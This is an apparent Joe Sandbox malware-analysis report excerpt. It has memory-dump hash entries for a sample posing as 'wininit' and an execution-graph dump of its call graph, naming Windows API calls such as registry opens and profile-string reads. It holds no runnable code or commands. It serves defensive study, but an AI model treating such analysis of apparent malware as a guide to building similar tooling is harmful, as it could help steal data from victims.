                                                  • Instruction ID: 159e01e36f13ea26bd11b6cccc05466d4026927050965abc8a159b9dbe696a59
                                                  • Opcode Fuzzy Hash: 975f12cd19c3882374c9719e153f546ff0cb4fe55b11ca2c16d1aca323d04cee
                                                  • Instruction Fuzzy Hash: 25E11774E102598FDB14DFA9C5809ADFBB2BF89301F24C169D819AB356C734A941CFA1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.420528950.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_370000_wininit.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: z|>
                                                  • API String ID: 0-1134487427
                                                  • Opcode ID: e3397d571ae3d86fa5cf6ffef425206677995e613d450ffbbc70c3c3708a4497
                                                  • Instruction ID: 928b4e376d7dfacc22c10b74cd908c5ccee67488caf5c059950e90882f2bd196
                                                  • Opcode Fuzzy Hash: e3397d571ae3d86fa5cf6ffef425206677995e613d450ffbbc70c3c3708a4497
                                                  • Instruction Fuzzy Hash: 7BE11974E001598FDB14DFA9C580AADFBB2BF89304F24C169D819AB356D734AD41CF61
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.420528950.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_370000_wininit.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: fo_N
                                                  • API String ID: 0-3502626514
                                                  • Opcode ID: 33213508f42c47e76d16542f05ba23d0e407f4c3bdad6eca6b62640643e175eb
                                                  • Instruction ID: 22c258ce9cb38265777bfbf77e5d00895c873bd9d905983a44862bd2be534cd6
                                                  • Opcode Fuzzy Hash: 33213508f42c47e76d16542f05ba23d0e407f4c3bdad6eca6b62640643e175eb
                                                  • Instruction Fuzzy Hash: DBE11774E102598FDB14DFA8C5809AEFBB2BF89301F24C169D919AB356D734AD41CFA0
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.420528950.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_370000_wininit.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 06d5046ad3875c38f1fd7ebeb84fde3623ef895bdd5c583dbb20c6e9256fac58
                                                  • Instruction ID: 6827fd8bb7bf0502c3b47fac431e3e8db720fe456db421b9c3ffad14f280e863
                                                  • Opcode Fuzzy Hash: 06d5046ad3875c38f1fd7ebeb84fde3623ef895bdd5c583dbb20c6e9256fac58
                                                  • Instruction Fuzzy Hash: 4EE10874E101598FDB24DFA8C5809ADFBB2BF89301F24C169D819AB356C735AD41CFA0
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.420528950.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_370000_wininit.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b08ff15a6e312a19f72b9d3c7cf67997ddc5167e5959b10aed5bbacba4671ed0
                                                  • Instruction ID: 6e800640b14ed361557f80feb9016e95a7b2f1cebf7924bef2478798a927f1bb
                                                  • Opcode Fuzzy Hash: b08ff15a6e312a19f72b9d3c7cf67997ddc5167e5959b10aed5bbacba4671ed0
                                                  • Instruction Fuzzy Hash: A2E10674E10259CFDB14DFA9C5809AEBBB2BF89301F24C169D819AB356C734AD41CFA0

                                                  Execution Graph

                                                  Execution Coverage:33.1%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:4.4%
                                                  Total number of Nodes:1845
                                                  Total number of Limit Nodes:99
                                                  execution_graph 9655 40c640 9656 404bee 7 API calls 9655->9656 9657 40c656 9656->9657 9658 40c70f 9657->9658 9659 404bee 7 API calls 9657->9659 9660 40c66b 9659->9660 9661 40c708 9660->9661 9663 404bee 7 API calls 9660->9663 9662 402bab 2 API calls 9661->9662 9662->9658 9664 40c683 9663->9664 9666 404bee 7 API calls 9664->9666 9669 40c701 9664->9669 9665 402bab 2 API calls 9665->9661 9670 40c694 9666->9670 9667 40c6f8 9668 402bab 2 API calls 9667->9668 9668->9669 9669->9665 9670->9667 9682 40c522 9670->9682 9672 40c6a9 9673 40c6ef 9672->9673 9674 405872 4 API calls 9672->9674 9675 402bab 2 API calls 9673->9675 9676 40c6c5 9674->9676 9675->9667 9677 405872 4 API calls 9676->9677 9678 40c6d5 9677->9678 9679 405872 4 API calls 9678->9679 9680 40c6e7 9679->9680 9681 402bab 2 API calls 9680->9681 9681->9673 9683 402b7c 2 API calls 9682->9683 9684 40c542 9683->9684 9684->9672 8300 409046 8313 413b28 8300->8313 8302 40906d 8304 405b6f 6 API calls 8302->8304 8303 40904e 8303->8302 8305 403fbf 7 API calls 8303->8305 8306 40907c 8304->8306 8305->8302 8307 409092 8306->8307 8317 409408 8306->8317 8309 4090a3 8307->8309 8312 402bab 2 API calls 8307->8312 8311 402bab 2 API calls 8311->8307 8312->8309 8314 413b31 8313->8314 8315 413b38 8313->8315 8316 404056 7 API calls 8314->8316 8315->8303 8316->8315 8318 409413 8317->8318 8319 40908c 8318->8319 8331 409d36 8318->8331 8319->8311 8330 40945c 8437 40a35d 8330->8437 8332 409d43 8331->8332 8333 40a35d 5 API calls 8332->8333 8334 409d55 8333->8334 8335 4031e5 4 API calls 8334->8335 8336 409d8b 8335->8336 8337 4031e5 4 API calls 8336->8337 8338 409dd0 8337->8338 8339 405b6f 6 API calls 8338->8339 8370 409423 8338->8370 8342 409df7 8339->8342 8340 409e1c 8341 4031e5 4 API calls 8340->8341 8340->8370 8343 409e62 8341->8343 8342->8340 8344 402bab 2 API calls 8342->8344 8345 4031e5 4 API calls 8343->8345 8344->8340 8346 409e82 8345->8346 8347 4031e5 4 API calls 8346->8347 8348 409ea2 8347->8348 8349 4031e5 4 API calls 8348->8349 8350 409ec2 8349->8350 8351 4031e5 4 API calls 8350->8351 8352 409ee2 8351->8352 8353 4031e5 4 API calls 8352->8353 8354 409f02 8353->8354 8355 4031e5 4 API calls 8354->8355 8356 409f22 8355->8356 8357 4031e5 4 API calls 8356->8357 8360 409f42 8357->8360 8358 40a19b 8359 408b2c 5 API calls 8358->8359 8359->8370 8360->8358 8361 409fa3 8360->8361 8362 405b6f 6 API calls 8361->8362 8361->8370 8363 409fbd 8362->8363 8364 40a02c 8363->8364 8365 402bab 2 API calls 8363->8365 8366 4031e5 4 API calls 8364->8366 8392 40a16d 8364->8392 8368 409fd7 8365->8368 8369 40a070 8366->8369 8367 402bab 2 API calls 8367->8370 8371 405b6f 6 API calls 8368->8371 8372 4031e5 4 API calls 8369->8372 8370->8330 8393 4056bf 8370->8393 8374 409fe5 8371->8374 8373 40a090 8372->8373 8375 4031e5 4 API calls 8373->8375 8374->8364 8376 402bab 2 API calls 8374->8376 8377 40a0b0 8375->8377 8378 409fff 8376->8378 8381 4031e5 4 API calls 8377->8381 8379 405b6f 6 API calls 8378->8379 8380 40a00d 8379->8380 8380->8364 8383 40a021 8380->8383 8382 40a0d0 8381->8382 8385 4031e5 4 API calls 8382->8385 8384 402bab 2 API calls 8383->8384 8384->8370 8386 40a0f0 8385->8386 8387 4031e5 4 API calls 8386->8387 8388 40a110 8387->8388 8389 4031e5 4 API calls 8388->8389 8390 40a134 8388->8390 8389->8390 8390->8392 8447 408b2c 8390->8447 8392->8367 8392->8370 8394 402b7c 2 API calls 8393->8394 8395 4056cd 8394->8395 8396 402b7c 2 API calls 8395->8396 8397 4056d4 8395->8397 8396->8397 8398 408c4d 8397->8398 8399 413ba4 7 API calls 8398->8399 8400 408c5c 8399->8400 8401 408f02 8400->8401 8402 408f3a 8400->8402 8405 40903e 8400->8405 8403 405b6f 6 API calls 8401->8403 8404 405b6f 6 API calls 8402->8404 8406 408f0c 8403->8406 8419 408f51 8404->8419 8421 413aca 8405->8421 8406->8405 8407 40a1b6 15 API calls 8406->8407 8409 408f31 8406->8409 8407->8409 8408 402bab 2 API calls 8408->8405 8409->8408 8410 405b6f 6 API calls 8410->8419 8412 409031 8413 402bab 2 API calls 8412->8413 8413->8409 8414 409022 8415 402bab 2 API calls 8414->8415 8416 409028 8415->8416 8417 402bab 2 API calls 8416->8417 8417->8409 8418 402bab GetProcessHeap HeapFree 8418->8419 8419->8405 8419->8409 8419->8410 8419->8412 8419->8414 8419->8418 8450 4044ee 8419->8450 8460 40a1b6 8419->8460 8422 413ad7 8421->8422 8430 409451 8421->8430 8423 405781 4 API calls 8422->8423 8424 413af0 8423->8424 8425 405781 4 API calls 8424->8425 8426 413afe 8425->8426 8427 405762 4 API calls 8426->8427 8428 413b0e 8427->8428 8429 405781 4 API calls 8428->8429 8428->8430 8429->8430 8431 405695 8430->8431 8432 4056a0 8431->8432 8433 4056b9 8431->8433 8434 402bab 2 API calls 8432->8434 8433->8330 8435 4056b3 8434->8435 8436 402bab 2 API calls 8435->8436 8436->8433 8438 40a368 8437->8438 8439 40a39a 8437->8439 8444 4031e5 4 API calls 8438->8444 8440 4031e5 4 API calls 8439->8440 8445 40a3af 8439->8445 8440->8445 8441 408b2c 5 API calls 8443 40a3ca 8441->8443 8442 40a38a 8442->8319 8443->8442 8446 408b2c 5 API calls 8443->8446 8444->8442 8445->8441 8445->8443 8446->8442 8448 4031e5 4 API calls 8447->8448 8449 408b3e FreeLibrary 8448->8449 8449->8392 8451 402b7c 2 API calls 8450->8451 8452 404512 8451->8452 8454 404585 GetLastError 8452->8454 8455 402bab 2 API calls 8452->8455 8458 402b7c 2 API calls 8452->8458 8459 40457c 8452->8459 8494 4044a7 8452->8494 8456 404592 8454->8456 8454->8459 8455->8452 8457 402bab 2 API calls 8456->8457 8457->8459 8458->8452 8459->8419 8461 40a202 8460->8461 8462 40a1c3 8460->8462 8497 405f08 8461->8497 8464 405b6f 6 API calls 8462->8464 8466 40a1d0 8464->8466 8465 40a1fc 8465->8419 8466->8465 8469 40a1f3 8466->8469 8504 40a45b 8466->8504 8468 40a333 8470 402bab 2 API calls 8468->8470 8472 402bab 2 API calls 8469->8472 8470->8465 8472->8465 8473 405b6f 6 API calls 8475 40a245 8473->8475 8474 40a25d 8476 405b6f 6 API calls 8474->8476 8475->8474 8477 413a58 14 API calls 8475->8477 8482 40a26b 8476->8482 8478 40a257 8477->8478 8481 402bab 2 API calls 8478->8481 8479 40a28b 8480 405b6f 6 API calls 8479->8480 8487 40a297 8480->8487 8481->8474 8482->8479 8483 40a284 8482->8483 8616 40955b 8482->8616 8485 402bab 2 API calls 8483->8485 8485->8479 8486 405b6f 6 API calls 8491 40a2b7 8486->8491 8488 40a2b0 8487->8488 8487->8491 8623 40968e 8487->8623 8489 402bab 2 API calls 8488->8489 8489->8491 8491->8468 8491->8486 8493 402bab 2 API calls 8491->8493 8633 4098a7 8491->8633 8493->8491 8495 4031e5 4 API calls 8494->8495 8496 4044b9 GetPrivateProfileStringW 8495->8496 8496->8452 8498 4031e5 4 API calls 8497->8498 8499 405f1d 8498->8499 8500 402b7c 2 API calls 8499->8500 8503 405f55 8499->8503 8501 405f36 8500->8501 8502 4031e5 4 API calls 8501->8502 8501->8503 8502->8503 8503->8465 8503->8468 8503->8473 8503->8474 8642 40642c 8504->8642 8506 40a469 8507 40c4ff 8506->8507 8645 4047e6 8506->8645 8507->8469 8510 4040bb 13 API calls 8511 40bf88 8510->8511 8511->8507 8512 403c90 9 API calls 8511->8512 8513 40bfaa 8512->8513 8514 402b7c 2 API calls 8513->8514 8516 40bfc1 8514->8516 8515 40c4f3 8517 403f9e 5 API calls 8515->8517 8518 40c3aa 8516->8518 8652 40a423 8516->8652 8517->8507 8518->8515 8521 4056bf 2 API calls 8518->8521 8525 40c4e3 8518->8525 8519 402bab 2 API calls 8519->8515 8523 40c3d2 8521->8523 8523->8525 8527 4040bb 13 API calls 8523->8527 8524 405f08 4 API calls 8526 40c005 8524->8526 8525->8519 8528 40c021 8526->8528 8655 40a43f 8526->8655 8529 40c3f3 8527->8529 8531 4031e5 4 API calls 8528->8531 8532 40c4d1 8529->8532 8712 405a52 8529->8712 8536 40c034 8531->8536 8535 413aca 4 API calls 8532->8535 8539 40c4dd 8535->8539 8542 4031e5 4 API calls 8536->8542 8537 40c411 8717 405a87 8537->8717 8538 402bab 2 API calls 8538->8528 8541 405695 2 API calls 8539->8541 8541->8525 8548 40c04d 8542->8548 8543 40c4b3 8544 402bab 2 API calls 8543->8544 8546 40c4cb 8544->8546 8545 405a52 4 API calls 8556 40c423 8545->8556 8547 403f9e 5 API calls 8546->8547 8547->8532 8550 4031e5 4 API calls 8548->8550 8549 405a87 4 API calls 8549->8556 8551 40c085 8550->8551 8552 4031e5 4 API calls 8551->8552 8554 40c09c 8552->8554 8553 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8553->8556 8557 4031e5 4 API calls 8554->8557 8555 402bab 2 API calls 8555->8556 8556->8543 8556->8545 8556->8549 8556->8553 8556->8555 8558 40c0b3 8557->8558 8559 4031e5 4 API calls 8558->8559 8560 40c0ca 8559->8560 8561 4031e5 4 API calls 8560->8561 8562 40c0e7 8561->8562 8563 4031e5 4 API calls 8562->8563 8564 40c100 8563->8564 8565 4031e5 4 API calls 8564->8565 8566 40c119 8565->8566 8567 4031e5 4 API calls 8566->8567 8568 40c132 8567->8568 8569 4031e5 4 API calls 8568->8569 8570 40c14b 8569->8570 8571 4031e5 4 API calls 8570->8571 8572 40c164 8571->8572 8573 4031e5 4 API calls 8572->8573 8574 40c17d 8573->8574 8575 4031e5 4 API calls 8574->8575 8576 40c196 8575->8576 8577 4031e5 4 API calls 8576->8577 8578 40c1af 8577->8578 8579 4031e5 4 API calls 8578->8579 8580 40c1c8 8579->8580 8581 4031e5 4 API calls 8580->8581 8582 40c1de 8581->8582 8583 4031e5 4 API calls 8582->8583 8584 40c1f4 8583->8584 8585 4031e5 4 API calls 8584->8585 8586 40c20d 8585->8586 8587 4031e5 4 API calls 8586->8587 8588 40c226 8587->8588 8589 4031e5 4 API calls 8588->8589 8590 40c23f 8589->8590 8591 4031e5 4 API calls 8590->8591 8592 40c258 8591->8592 8593 4031e5 4 API calls 8592->8593 8594 40c273 8593->8594 8595 4031e5 4 API calls 8594->8595 8596 40c28a 8595->8596 8597 4031e5 4 API calls 8596->8597 8600 40c2d5 8597->8600 8598 40c3a2 8599 402bab 2 API calls 8598->8599 8599->8518 8600->8598 8601 4031e5 4 API calls 8600->8601 8602 40c315 8601->8602 8603 40c38b 8602->8603 8658 404866 8602->8658 8605 403c40 5 API calls 8603->8605 8607 40c397 8605->8607 8608 403c40 5 API calls 8607->8608 8608->8598 8609 40c382 8611 403c40 5 API calls 8609->8611 8611->8603 8613 406c4c 6 API calls 8614 40c355 8613->8614 8614->8609 8682 4126a7 8614->8682 8617 409673 8616->8617 8622 40956d 8616->8622 8617->8483 8618 408b45 6 API calls 8618->8622 8619 4059d8 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 8619->8622 8620 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8620->8622 8621 402bab GetProcessHeap HeapFree 8621->8622 8622->8617 8622->8618 8622->8619 8622->8620 8622->8621 8624 4040bb 13 API calls 8623->8624 8632 4096a9 8624->8632 8625 40989f 8625->8488 8626 409896 8627 403f9e 5 API calls 8626->8627 8627->8625 8629 408b45 6 API calls 8629->8632 8630 402bab GetProcessHeap HeapFree 8630->8632 8631 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8631->8632 8632->8625 8632->8626 8632->8629 8632->8630 8632->8631 8881 4059d8 8632->8881 8634 4040bb 13 API calls 8633->8634 8641 4098c1 8634->8641 8635 4099fb 8635->8491 8636 4099f3 8637 403f9e 5 API calls 8636->8637 8637->8635 8638 402bab GetProcessHeap HeapFree 8638->8641 8639 4059d8 4 API calls 8639->8641 8640 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8640->8641 8641->8635 8641->8636 8641->8638 8641->8639 8641->8640 8643 4031e5 4 API calls 8642->8643 8644 406441 GetNativeSystemInfo 8643->8644 8644->8506 8646 4031e5 4 API calls 8645->8646 8647 40480a 8646->8647 8648 4031e5 4 API calls 8647->8648 8649 40484f 8647->8649 8651 40485d 8647->8651 8648->8647 8650 403c40 5 API calls 8649->8650 8650->8651 8651->8507 8651->8510 8653 4031e5 4 API calls 8652->8653 8654 40a435 8653->8654 8654->8524 8656 4031e5 4 API calls 8655->8656 8657 40a451 8656->8657 8657->8538 8659 4031e5 4 API calls 8658->8659 8660 40487c 8659->8660 8660->8609 8661 406c4c 8660->8661 8722 4068eb 8661->8722 8663 406e02 8663->8613 8664 406cab 8734 40469b 8664->8734 8665 406c6c 8665->8663 8665->8664 8731 406894 8665->8731 8672 406df1 8673 40469b 4 API calls 8672->8673 8673->8663 8674 406cef 8674->8672 8675 4031e5 4 API calls 8674->8675 8676 406d26 8675->8676 8676->8672 8677 40771e 6 API calls 8676->8677 8681 406d57 8677->8681 8678 406da2 8679 4031e5 4 API calls 8678->8679 8679->8672 8681->8678 8747 4068b0 8681->8747 8683 4126bb 8682->8683 8687 4126d1 8682->8687 8691 412840 8683->8691 8803 40488c 8683->8803 8687->8691 8809 407055 8687->8809 8688 412837 8689 403c40 5 API calls 8688->8689 8689->8691 8691->8609 8693 41281e 8694 4070ff 6 API calls 8693->8694 8694->8688 8695 407055 6 API calls 8696 412742 8695->8696 8696->8693 8697 40719a 6 API calls 8696->8697 8698 41276e 8697->8698 8699 412804 8698->8699 8825 406f4a 8698->8825 8853 4070ff 8699->8853 8702 41279a 8831 412553 8702->8831 8875 405907 8712->8875 8714 405907 4 API calls 8715 405a61 8714->8715 8715->8714 8716 405a76 8715->8716 8716->8537 8718 402b7c 2 API calls 8717->8718 8721 405a99 8718->8721 8719 405ade 8719->8556 8721->8719 8878 40595e 8721->8878 8750 4076a8 8722->8750 8724 406913 8725 406a61 8724->8725 8726 40771e 6 API calls 8724->8726 8725->8665 8730 406949 8726->8730 8727 40771e 6 API calls 8727->8730 8728 404678 4 API calls 8728->8730 8730->8725 8730->8727 8730->8728 8756 4046c2 8730->8756 8732 4031e5 4 API calls 8731->8732 8733 4068a6 8732->8733 8733->8665 8735 4046a4 8734->8735 8737 4046b4 8734->8737 8736 4031e5 4 API calls 8735->8736 8736->8737 8737->8663 8738 404678 8737->8738 8739 4031e5 4 API calls 8738->8739 8740 40468b 8739->8740 8740->8663 8741 40771e 8740->8741 8742 407748 8741->8742 8743 407737 8741->8743 8742->8674 8744 407644 6 API calls 8743->8744 8745 407741 8744->8745 8746 406baa 6 API calls 8745->8746 8746->8742 8748 4031e5 4 API calls 8747->8748 8749 4068c2 8748->8749 8749->8681 8751 4076c1 8750->8751 8753 4076d2 8750->8753 8764 407644 8751->8764 8753->8724 8757 4046d3 8756->8757 8758 4046d9 8756->8758 8799 40464c 8757->8799 8760 4046e9 8758->8760 8762 404678 4 API calls 8758->8762 8761 404714 8760->8761 8763 40469b 4 API calls 8760->8763 8761->8730 8762->8760 8763->8761 8765 407653 8764->8765 8766 407661 8764->8766 8765->8766 8772 406a6b 8765->8772 8768 406baa 8766->8768 8769 406bc8 8768->8769 8770 406bbb 8768->8770 8769->8753 8770->8769 8780 407402 8770->8780 8776 406a81 8772->8776 8773 402b7c 2 API calls 8773->8776 8774 406b8b 8774->8766 8775 406894 4 API calls 8775->8776 8776->8773 8776->8774 8776->8775 8777 406b96 8776->8777 8779 402bab 2 API calls 8776->8779 8778 402bab 2 API calls 8777->8778 8778->8774 8779->8776 8781 407644 6 API calls 8780->8781 8782 407412 8781->8782 8783 402b7c 2 API calls 8782->8783 8790 407450 8782->8790 8784 407483 8783->8784 8785 402b7c 2 API calls 8784->8785 8784->8790 8787 4074ce 8785->8787 8786 4074da 8788 4068cc 2 API calls 8786->8788 8787->8786 8789 402b7c 2 API calls 8787->8789 8788->8790 8793 40751f 8789->8793 8790->8769 8791 40752b 8792 4068cc 2 API calls 8791->8792 8792->8786 8793->8791 8795 4068cc 8793->8795 8796 4068d6 8795->8796 8797 4068e3 8795->8797 8796->8797 8798 402bab GetProcessHeap HeapFree 8796->8798 8797->8791 8798->8797 8800 404659 8799->8800 8802 404666 8799->8802 8801 4031e5 4 API calls 8800->8801 8801->8802 8802->8758 8804 4047e6 5 API calls 8803->8804 8805 404897 8804->8805 8806 40489c 8805->8806 8861 4047c7 8805->8861 8806->8687 8810 40706f 8809->8810 8811 407084 8809->8811 8810->8811 8812 407644 6 API calls 8810->8812 8816 4070e4 8811->8816 8864 406fd2 8811->8864 8813 40707d 8812->8813 8815 406baa 6 API calls 8813->8815 8815->8811 8816->8688 8817 40719a 8816->8817 8818 4071b0 8817->8818 8820 4071c5 8817->8820 8819 407644 6 API calls 8818->8819 8818->8820 8821 4071be 8819->8821 8823 406fd2 4 API calls 8820->8823 8824 407226 8820->8824 8822 406baa 6 API calls 8821->8822 8822->8820 8823->8824 8824->8693 8824->8695 8826 406f64 8825->8826 8829 406f75 8825->8829 8827 407644 6 API calls 8826->8827 8828 406f6e 8827->8828 8830 406baa 6 API calls 8828->8830 8829->8702 8830->8829 8872 4060ac 8831->8872 8854 407116 8853->8854 8856 40712b 8853->8856 8855 407644 6 API calls 8854->8855 8854->8856 8857 407124 8855->8857 8858 406fd2 4 API calls 8856->8858 8860 407187 8856->8860 8859 406baa 6 API calls 8857->8859 8858->8860 8859->8856 8860->8693 8862 4031e5 4 API calls 8861->8862 8863 4047d9 8862->8863 8863->8687 8865 406fde 8864->8865 8866 407027 8865->8866 8867 4031e5 4 API calls 8865->8867 8866->8816 8868 406ffa 8867->8868 8869 4031e5 4 API calls 8868->8869 8870 407011 8869->8870 8871 4031e5 4 API calls 8870->8871 8871->8866 8873 4031e5 4 API calls 8872->8873 8874 4060bb 8873->8874 8874->8874 8876 4031e5 4 API calls 8875->8876 8877 40591a 8876->8877 8877->8715 8879 4031e5 4 API calls 8878->8879 8880 405971 8879->8880 8880->8721 8882 4031e5 4 API calls 8881->8882 8883 4059ed 8882->8883 8884 402b7c 2 API calls 8883->8884 8887 405a38 8883->8887 8885 405a16 8884->8885 8886 4031e5 4 API calls 8885->8886 8885->8887 8886->8887 8887->8632 9749 40a349 9750 4098a7 14 API calls 9749->9750 9751 40a359 9750->9751 8966 408952 8987 40823f 8966->8987 8969 408960 8971 4056bf 2 API calls 8969->8971 8972 40896a 8971->8972 9015 408862 8972->9015 8974 413aca 4 API calls 8975 4089d4 8974->8975 8977 405695 2 API calls 8975->8977 8976 408975 8984 4089c4 8976->8984 9023 4087d6 8976->9023 8980 4089df 8977->8980 8984->8974 8985 402bab 2 API calls 8986 40899d 8985->8986 8986->8984 8986->8985 8988 40824d 8987->8988 8989 40831b 8988->8989 8990 4031e5 4 API calls 8988->8990 8989->8969 9003 4083bb 8989->9003 8991 40826d 8990->8991 8992 4031e5 4 API calls 8991->8992 8993 408289 8992->8993 8994 4031e5 4 API calls 8993->8994 8995 4082a5 8994->8995 8996 4031e5 4 API calls 8995->8996 8997 4082c1 8996->8997 8998 4031e5 4 API calls 8997->8998 8999 4082e2 8998->8999 9000 4031e5 4 API calls 8999->9000 9001 4082ff 9000->9001 9002 4031e5 4 API calls 9001->9002 9002->8989 9051 408363 9003->9051 9006 4084ab 9006->8969 9007 4056bf 2 API calls 9008 4083f4 9007->9008 9009 408492 9008->9009 9054 40815d 9008->9054 9069 40805d 9008->9069 9010 413aca 4 API calls 9009->9010 9011 4084a0 9010->9011 9012 405695 2 API calls 9011->9012 9012->9006 9084 404b8f 9015->9084 9017 408946 9017->8976 9018 4031e5 4 API calls 9020 40887e 9018->9020 9019 40893e 9087 404a39 9019->9087 9020->9017 9020->9018 9020->9019 9022 402b7c 2 API calls 9020->9022 9022->9020 9024 402b7c 2 API calls 9023->9024 9025 4087e7 9024->9025 9026 4031e5 4 API calls 9025->9026 9030 40885a 9025->9030 9027 408802 9026->9027 9031 40884d 9027->9031 9034 408853 9027->9034 9096 408522 9027->9096 9100 4084b4 9027->9100 9028 402bab 2 API calls 9028->9030 9035 408749 9030->9035 9103 4084d4 9031->9103 9034->9028 9036 404b8f 5 API calls 9035->9036 9041 408765 9036->9041 9037 4031e5 4 API calls 9037->9041 9038 408522 4 API calls 9038->9041 9039 4087c7 9040 404a39 5 API calls 9039->9040 9042 4087cf 9040->9042 9041->9037 9041->9038 9041->9039 9041->9042 9043 4085d1 9042->9043 9044 4086c2 9043->9044 9049 4085e9 9043->9049 9044->8986 9046 402bab 2 API calls 9046->9049 9047 4031e5 4 API calls 9047->9049 9049->9044 9049->9046 9049->9047 9109 4089e6 9049->9109 9128 4086c9 9049->9128 9132 4036a3 9049->9132 9052 4031e5 4 API calls 9051->9052 9053 408386 9052->9053 9053->9006 9053->9007 9055 40816f 9054->9055 9056 4081b6 9055->9056 9057 4081fd 9055->9057 9068 4081ef 9055->9068 9059 405872 4 API calls 9056->9059 9058 405872 4 API calls 9057->9058 9060 408213 9058->9060 9061 4081cf 9059->9061 9062 405872 4 API calls 9060->9062 9063 405872 4 API calls 9061->9063 9064 408222 9062->9064 9065 4081df 9063->9065 9066 405872 4 API calls 9064->9066 9067 405872 4 API calls 9065->9067 9066->9068 9067->9068 9068->9008 9070 40808c 9069->9070 9071 4080d2 9070->9071 9072 408119 9070->9072 9083 40810b 9070->9083 9074 405872 4 API calls 9071->9074 9073 405872 4 API calls 9072->9073 9075 40812f 9073->9075 9076 4080eb 9074->9076 9077 405872 4 API calls 9075->9077 9078 405872 4 API calls 9076->9078 9079 40813e 9077->9079 9080 4080fb 9078->9080 9081 405872 4 API calls 9079->9081 9082 405872 4 API calls 9080->9082 9081->9083 9082->9083 9083->9008 9090 404a19 9084->9090 9086 404ba0 9086->9020 9093 4049ff 9087->9093 9089 404a44 9089->9017 9091 4031e5 4 API calls 9090->9091 9092 404a2c RegOpenKeyW 9091->9092 9092->9086 9094 4031e5 4 API calls 9093->9094 9095 404a12 RegCloseKey 9094->9095 9095->9089 9098 408534 9096->9098 9097 4085af 9097->9027 9098->9097 9106 4084ee 9098->9106 9101 4031e5 4 API calls 9100->9101 9102 4084c7 9101->9102 9102->9027 9104 4031e5 4 API calls 9103->9104 9105 4084e7 9104->9105 9105->9034 9107 4031e5 4 API calls 9106->9107 9108 408501 9107->9108 9108->9097 9110 4031e5 4 API calls 9109->9110 9111 408a06 9110->9111 9112 408b21 9111->9112 9113 4031e5 4 API calls 9111->9113 9112->9049 9116 408a32 9113->9116 9114 408b17 9144 403649 9114->9144 9116->9114 9135 403666 9116->9135 9120 4031e5 4 API calls 9121 408a88 9120->9121 9122 4031e5 4 API calls 9121->9122 9127 408b0e 9121->9127 9123 408ac4 9122->9123 9124 405b6f 6 API calls 9123->9124 9125 408aff 9124->9125 9125->9127 9138 408508 9125->9138 9141 40362f 9127->9141 9129 408744 9128->9129 9131 4086e2 9128->9131 9129->9049 9130 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 9130->9131 9131->9129 9131->9130 9133 4031e5 4 API calls 9132->9133 9134 4036b5 9133->9134 9134->9049 9136 4031e5 4 API calls 9135->9136 9137 403679 9136->9137 9137->9120 9137->9127 9139 4031e5 4 API calls 9138->9139 9140 40851b 9139->9140 9140->9127 9142 4031e5 4 API calls 9141->9142 9143 403642 9142->9143 9143->9114 9145 4031e5 4 API calls 9144->9145 9146 40365c 9145->9146 9146->9112 9786 41045c 9787 4040bb 13 API calls 9786->9787 9788 410477 9787->9788 9789 41060b 9788->9789 9817 407851 9788->9817 9791 41048f 9792 407851 2 API calls 9791->9792 9798 410604 9791->9798 9794 4104a9 9792->9794 9793 403f9e 5 API calls 9793->9789 9799 4105e0 9794->9799 9800 405ae9 6 API calls 9794->9800 9802 4105eb 9794->9802 9803 41056f 9794->9803 9795 402bab 2 API calls 9797 4105fb 9795->9797 9796 402bab 2 API calls 9796->9798 9797->9796 9798->9793 9801 402bab 2 API calls 9799->9801 9799->9802 9800->9794 9801->9802 9802->9795 9802->9797 9803->9799 9804 4105d6 9803->9804 9806 412269 6 API calls 9803->9806 9805 402bab 2 API calls 9804->9805 9805->9799 9807 410580 9806->9807 9807->9804 9808 405872 4 API calls 9807->9808 9809 410599 9808->9809 9810 405872 4 API calls 9809->9810 9811 4105a9 9810->9811 9812 405872 4 API calls 9811->9812 9813 4105bb 9812->9813 9814 405872 4 API calls 9813->9814 9815 4105cd 9814->9815 9816 402bab 2 API calls 9815->9816 9816->9804 9818 407866 9817->9818 9819 402b7c 2 API calls 9818->9819 9820 407899 9818->9820 9819->9820 9820->9791 9208 40f561 9211 40f4b6 9208->9211 9212 413b28 7 API calls 9211->9212 9213 40f4bf 9212->9213 9214 405b6f 6 API calls 9213->9214 9215 413a58 14 API calls 9213->9215 9216 40f559 9213->9216 9217 402bab GetProcessHeap HeapFree 9213->9217 9214->9213 9215->9213 9217->9213 9221 403b64 9222 4031e5 4 API calls 9221->9222 9223 403b77 PathFileExistsW 9222->9223 9852 40d069 9853 404bee 7 API calls 9852->9853 9854 40d080 9853->9854 9855 404bee 7 API calls 9854->9855 9880 40d1e2 9854->9880 9856 40d099 9855->9856 9857 404bee 7 API calls 9856->9857 9858 40d0a7 9857->9858 9859 404ba7 4 API calls 9858->9859 9860 40d0b6 9859->9860 9861 404bee 7 API calls 9860->9861 9862 40d0c5 9861->9862 9863 404c4e 6 API calls 9862->9863 9864 40d0dc 9863->9864 9865 404bee 7 API calls 9864->9865 9866 